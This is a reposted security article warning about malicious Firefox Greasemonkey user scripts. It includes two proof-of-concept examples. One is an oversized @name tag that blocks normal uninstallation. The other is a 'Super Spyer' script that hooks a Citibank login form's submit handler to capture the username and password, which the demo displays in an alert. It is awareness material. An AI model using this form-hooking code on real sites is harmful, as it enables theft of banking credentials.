New apps: Super Spyer

Firefox Greasemonkey

       ---------------------------------------------------
	  Vision of danger: The Firefox Greasemonkey
       ---------------------------------------------------
	 written by Piotr Bania <bania.piotr@gmail.com>

	     [___ http://pb.specialised.info ___]

   Original location: http://pb.specialised.info/all/articles/monkey.txt

  -----------------
   0. DISCLAIMER
  -----------------

	Author takes no responsibility for any actions with provided information 
        or codes. The copyright for any material created by the author is reserved. 
        Any duplication of codes or texts provided here in electronic or printed 
	publications (including compiled code) is not permitted without the author's 
	agreement.

  -----------------
   I. INTRODUCTION
  -----------------

	Greasemonkey is a free and very popular nowadays extension for Firefox 
	browser. This tool lets users to add DHTML scripts to any web site 
	and change its original behaviour. Its a nice feature, nice for good
	and bad guys...This short paper was written to show what can happen if 
	user will run a "bad" script, the idea is to show the danger itself.

  -----------------
   II. BAD SCRIPTS
  -----------------  

	A) MAKING "UNABLE TO UNINSTALL" SCRIPT

	Usually standard script starts with special header (metadata tags) like here:
	--------// SNIP //--------
	// ==UserScript==
	// @name          Say Hello!
	// @namespace     http://youngpup.net/userscripts
	// @description	  Greets the world
	// @include       http://google.com/*
	// @include       http://www.google.com/*
	// @exclude       http://gmail.google.com/*
	// ==/UserScript==
	--------// SNIP //--------

	Following information is used when installing/working/uninstalling Greasemonkey
	scripts. Script with specially generated @name metadata tag cannot be uninstalled
	automatically with Firefox (user must delete the file by hand). Here is a sample "bad"
	@name tag:

	--------// SNIP //--------
	// ==UserScript==
	// @name          Im a script <5000*SPACE_CHAR_:])		
	// ...
	--------// SNIP //--------

	Within the script uninstallation the windows resizes and the only thing user can do is 
	close it. If user wants to delete the script he must do it manually, and delete 
	the file from:	"{firefox profile dir}\extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}\
	chrome\greasemonkey\content\scripts\" dir.

	B) SPYING THE CITYBANK LOGIN PAGE

	Potential attacker can also write a script which will steal some data, like demonstrated below.
	Anyway there are plenty of other ideas, here we assume a scenario in which the attacker
	wants to grab CITYBANK user LOGIN and PASSWORD.

	Original website: 

https://cib.ibanking-services.com/cib/login.jsp?FIORG=775&FIFID=125106986&id=1449852460

	(SPYER.user.js)
	--------// SNIP //--------
	// ==UserScript==
	// @name          Super Spyer :)  - (c) Piotr Bania <bania.piotr@gmail.com>
	// @namespace     http://pb.specialised.info
	// @description	  Shows potencial risk of Firefox scripting.
	// @include	  *
	// ==/UserScript==s

	// we assume that form used by Citibank is named as "login", the login textbox is named 
	// as "userid" and password box is named as "password" look at CITIBANK page source.
	// Citibank is using some "onsumbit" routine so we must execute it together with ours

	(function() {
	var old_ons = document.login.onsubmit.toString();		// grab old routine name
	var new_ons = "spy();" + "\r" + old_ons.substring(old_ons.indexOf("{") + 1,old_ons.lastIndexOf("}") - 1);
	document.login.onsubmit = new Function(new_ons);
	})();

	function spy() {
	alert("I have spyed you!!!\n\r\n\r\n\r-------------\n\rLOGIN: "+document.login.userid.value+"\n
	PASSWORD: "+document.login.password.value+"\n\r-------------\n\r\n\r\n\rhttp://pb.specialised.info");
	}
	--------// SNIP //--------	

	Such stolen information can be transferred to attackers servers/email accounts etc. etc.
	There are many types and variations of such scenario.

  ----------------------
   III. FINAL THOUGHTS
  ----------------------

	Using Greasemonkey can be fun and a dangerous also, everything depends on the level of 
	user knowledge...

	I want to end this short article with words from Aaron Boodman (author of Greasemonkey):

	"All I can say is that just like any other software, you should think a tiny bit before 
	installing a user script... Make sure the author is someone you trust, or 
	at least in a social network you trust."

	Peace.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Cancel

Connecting to %s